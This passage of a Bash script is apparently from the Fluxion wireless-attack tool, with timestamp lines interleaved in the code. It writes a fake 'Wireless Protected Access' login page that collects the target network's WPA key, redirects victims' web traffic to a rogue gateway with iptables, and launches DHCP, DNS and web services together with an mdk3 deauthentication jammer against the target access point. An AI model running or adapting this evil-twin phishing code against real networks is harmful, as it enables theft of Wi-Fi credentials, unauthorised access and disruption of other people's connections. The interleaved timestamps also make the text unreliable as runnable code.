<title>Wireless Protected Access: Key Mismatch</title>
<!-- Styles -->
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/jquery.mobile-1.4.5.min.css\" />
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/main.css\" />
<!-- Scripts -->
<script src = \" js/jquery-1.11.1.min.js\" ></script>
<script src = \" js/jquery.mobile-1.4.5.min.js\" ></script>
<script src = \" js/jquery.validate.min.js\" ></script>
<script src = \" js/additional-methods.min.js\" ></script>
</head>
<body>
<!-- Error page -->
<div data-role= \" page\" data-theme= \" a\" >
<div data-role= \" main\" class = \" ui-content ui-body ui-body-b\" dir = \" $DIALOG_WEB_DIR \" >
<h3 style = \" text-align:center; \" >$DIALOG_WEB_ERROR </h3>
<a href = \" index.html\" class = \" ui-btn ui-corner-all ui-shadow\" onclick = \" location.href= 'index.html' \" >$DIALOG_WEB_BACK </a>
</div>
</div>
</body>
2017-08-09 18:31:32 -06:00
</html>" > " $FLUXIONWorkspacePath /captive_portal/error.html"
2017-08-08 12:48:00 -06:00
echo " \
<!DOCTYPE html>
<html>
<head>
<meta charset = \" UTF-8\" >
<meta name = \" viewport\" content = \" width = device-width, height = device-height, initial-scale= 1.0\" >
<title>Wireless Protected Access: Login</title>
<!-- Styles -->
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/jquery.mobile-1.4.5.min.css\" />
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/main.css\" />
<!-- Scripts -->
<script src = \" js/jquery-1.11.1.min.js\" ></script>
<script src = \" js/jquery.mobile-1.4.5.min.js\" ></script>
<script src = \" js/jquery.validate.min.js\" ></script>
<script src = \" js/additional-methods.min.js\" ></script>
</head>
<body>
<!-- Main page -->
<div data-role= \" page\" data-theme= \" a\" >
<div class = \" ui-content\" dir = \" $DIALOG_WEB_DIR \" >
<fieldset>
<form id = \" loginForm\" class = \" ui-body ui-body-b ui-corner-all\" action = \" check.php\" method = \" POST\" >
</br>
<div class = \" ui-field-contain ui-responsive\" style = \" text-align:center; \" >
<div><u>$APTargetSSID </u> ( $APTargetMAC ) </div>
<!--<div>Channel: $APTargetChannel </div>-->
</div>
<div style = \" text-align:center; \" >
<br>
<label>$DIALOG_WEB_INFO </label>
<br>
</div>
<div class = \" ui-field-contain\" >
<label for = \" key1\" >$DIALOG_WEB_INPUT </label>
<input id = \" key1\" style = \" color:#333; background-color:#CCC\" data-clear-btn= \" true\" type = \" password\" value = \" \" name = \" key1\" maxlength = \" 64\" />
</div>
<input data-icon= \" check\" data-inline= \" true\" name = \" submitBtn\" type = \" submit\" value = \" $DIALOG_WEB_SUBMIT \" />
</form>
</fieldset>
</div>
</div>
<script src = \" js/main.js\" ></script>
<script>
$.extend( $.validator.messages, {
required: \" $DIALOG_WEB_ERROR_MSG \" ,
maxlength: $.validator.format( \" $DIALOG_WEB_LENGTH_MAX \" ) ,
minlength: $.validator.format( \" $DIALOG_WEB_LENGTH_MIN \" )
} ) ;
</script>
</body>
2017-08-09 18:31:32 -06:00
</html>" > " $FLUXIONWorkspacePath /captive_portal/index.html"
2017-08-08 12:48:00 -06:00
}
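#######################################
# Put the host's firewall rules and IPv4 forwarding back as they were.
# Globals:   FLUXIONWorkspacePath, FLUXIONOutputDevice (read)
#######################################
function captive_portal_unset_routes() {
  if [ -f "$FLUXIONWorkspacePath/iptables-rules" ]; then
    # Preferred path: reload the ruleset saved before the rules were changed.
    iptables-restore <"$FLUXIONWorkspacePath/iptables-rules" &>"$FLUXIONOutputDevice"
    sandbox_remove_workfile "$FLUXIONWorkspacePath/iptables-rules"
  else
    # No saved ruleset: fall back to wiping filter and nat tables.
    # NOTE(review): this discards any rules the host had before and does not
    # reset chain policies (captive_portal_set_routes sets FORWARD to ACCEPT),
    # so the host may be left more permissive than it started; verify the
    # firewall state manually after this path runs.
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
  fi

  # Restore system's original forwarding state.
  if [ -f "$FLUXIONWorkspacePath/ip_forward" ]; then
    sysctl -w "net.ipv4.ip_forward=$(cat "$FLUXIONWorkspacePath/ip_forward")" &>"$FLUXIONOutputDevice"
    sandbox_remove_workfile "$FLUXIONWorkspacePath/ip_forward"
  fi
}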
# Set up the gateway address, route, IPv4 forwarding and NAT rules used by the DHCP / web server.
function captive_portal_set_routes( ) {
# Give an address to the gateway interface in the network.
ifconfig $VIGW $VIGWAddress netmask 255.255.255.0
# Add a route to the virtual gateway interface.
route add -net $VIGWNetwork .0 netmask 255.255.255.0 gw $VIGWAddress
2017-08-11 02:29:47 -06:00
# Save the system's routing state to restore later.
cp "/proc/sys/net/ipv4/ip_forward" " $FLUXIONWorkspacePath /ip_forward "
2017-08-08 12:48:00 -06:00
# Activate system IPV4 packet routing/forwarding.
sysctl -w net.ipv4.ip_forward= 1 & >$FLUXIONOutputDevice
2017-08-11 02:29:47 -06:00
iptables-save > " $FLUXIONWorkspacePath /iptables-rules "
2017-08-08 12:48:00 -06:00
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $VIGWAddress :80
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $VIGWAddress :443
iptables -A INPUT -p tcp --sport 443 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT
iptables -t nat -A POSTROUTING -j MASQUERADE
}
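#######################################
# Undo routing changes and stop the AP service if one is running.
# Globals:   APRogueService, WIAccessPoint (read)
#######################################
function captive_portal_stop_interface() {
  captive_portal_unset_routes

  # The AP service only exists for wireless access-point interfaces.
  if [ "$APRogueService" ] && interface_is_wireless "$WIAccessPoint"; then
    ap_stop
  fi
}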
function captive_portal_start_interface( ) {
2017-09-02 14:48:36 -06:00
if [ " $APRogueService " ] && interface_is_wireless " $WIAccessPoint " ; then
echo -e " $FLUXIONVLine $CaptivePortalStaringAPServiceNotice "
ap_start
fi
2017-08-30 15:41:09 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStaringAPRoutesNotice "
captive_portal_set_routes &
sleep 3
fuser -n tcp -k 53 67 80 443 & > $FLUXIONOutputDevice
fuser -n udp -k 53 67 80 443 & > $FLUXIONOutputDevice
}
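#######################################
# Undo every preparation step, in reverse order of prep_attack.
# Globals:   CaptivePortalState (written)
#######################################
function unprep_attack() {
  CaptivePortalState="Not Ready"

  captive_portal_unset_attack
  captive_portal_unset_site
  captive_portal_unset_cert
  captive_portal_unset_auth
  captive_portal_unset_interface
}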
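#######################################
# Run the preparation steps in order until all succeed.
# A failing interface step aborts; any other failing step restarts the
# sequence from the top (completed steps skip themselves).
# Globals:   CaptivePortalState (read, written)
# Returns:   1 when preparation was aborted.
#######################################
function prep_attack() {
  while true; do
    captive_portal_set_interface || break
    captive_portal_set_auth || continue
    captive_portal_set_cert || continue
    captive_portal_set_site || continue
    captive_portal_set_attack || continue
    CaptivePortalState="Ready"
    break
  done

  # Check for prep abortion.
  if [ "$CaptivePortalState" = "Not Ready" ]; then
    unprep_attack
    return 1
  fi
}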
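#######################################
# Stop every process started for the attack and undo interface changes.
# Processes are located by matching their command line / window title in
# `ps a` output, so unrelated processes with matching text would be hit too.
# Globals:   CaptivePortalServerPID (read, cleared),
#            FLUXIONWorkspacePath, FLUXIONOutputDevice (read)
#######################################
function stop_attack() {
  # Attempt to find PIDs of any running authenticators.
  # Declaration and assignment are split so the pipeline status is not masked.
  local authenticatorPID
  authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}')

  # Signal any authenticator to stop authentication loop.
  # Unquoted on purpose: the variable may hold several PIDs.
  if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi

  killall mdk3 &>"$FLUXIONOutputDevice"

  local FLUXIONJammer
  FLUXIONJammer=$(ps a | grep -e "FLUXION AP Jammer" | awk '{print $1}')
  if [ "$FLUXIONJammer" ]; then
    kill $FLUXIONJammer &>"$FLUXIONOutputDevice"
  fi

  sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk3_blacklist.lst"

  # Kill captive portal web server.
  if [ "$CaptivePortalServerPID" ]; then
    kill "$CaptivePortalServerPID" &>"$FLUXIONOutputDevice"
    CaptivePortalServerPID=""
  fi

  # Kill python DNS service if one is found.
  local FLUXIONDNS
  FLUXIONDNS=$(ps a | grep -e "FLUXION AP DNS" | awk '{print $1}')
  if [ "$FLUXIONDNS" ]; then
    kill $FLUXIONDNS &>"$FLUXIONOutputDevice"
  fi

  # Kill DHCP service.
  local FLUXIONDHCP
  FLUXIONDHCP=$(ps a | grep -e "FLUXION AP DHCP" | awk '{print $1}')
  if [ "$FLUXIONDHCP" ]; then
    kill $FLUXIONDHCP &>"$FLUXIONOutputDevice"
  fi

  sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt"

  captive_portal_stop_interface
}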
function start_attack( ) {
if [ " $CaptivePortalState " = "Running" ] ; then return 0; fi
stop_attack
2017-08-30 15:41:09 -06:00
captive_portal_start_interface
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice "
2017-08-20 13:04:22 -06:00
xterm -bg black -fg green $TOPLEFT -title "FLUXION AP DHCP Service" -e " dhcpd -d -f -lf \" $FLUXIONWorkspacePath /dhcpd.leases\" -cf \" $FLUXIONWorkspacePath /dhcpd.conf\" $VIGW 2>&1 | tee -a \" $FLUXIONWorkspacePath /clients.txt\" " &
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingDNSServiceNotice "
2017-08-20 20:38:53 -06:00
xterm $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "FLUXION AP DNS Service" -e " if type python2 >/dev/null 2>/dev/null; then python2 \" $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py\"; else python \" $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py\"; fi " &
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingWebServiceNotice "
2017-08-09 18:31:32 -06:00
lighttpd -f " $FLUXIONWorkspacePath /lighttpd.conf " & > $FLUXIONOutputDevice
2017-08-08 12:48:00 -06:00
CaptivePortalServerPID = $!
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingJammerServiceNotice "
2017-08-09 22:30:23 -06:00
echo -e " $APTargetMAC " > " $FLUXIONWorkspacePath /mdk3_blacklist.lst "
2017-08-30 15:01:38 -06:00
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title " FLUXION AP Jammer [mdk3] $APTargetSSID " -e " mdk3 $WIMonitor d -c $APTargetChannel -b \" $FLUXIONWorkspacePath /mdk3_blacklist.lst\" " &
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice "
2017-08-18 01:39:52 -06:00
xterm -hold $TOPRIGHT -bg "#000000" -fg "#CCCCCC" -title "FLUXION AP Authenticator" -e " $FLUXIONWorkspacePath /captive_portal_authenticator.sh " &
2017-08-08 12:48:00 -06:00
}
# FLUXSCRIPT END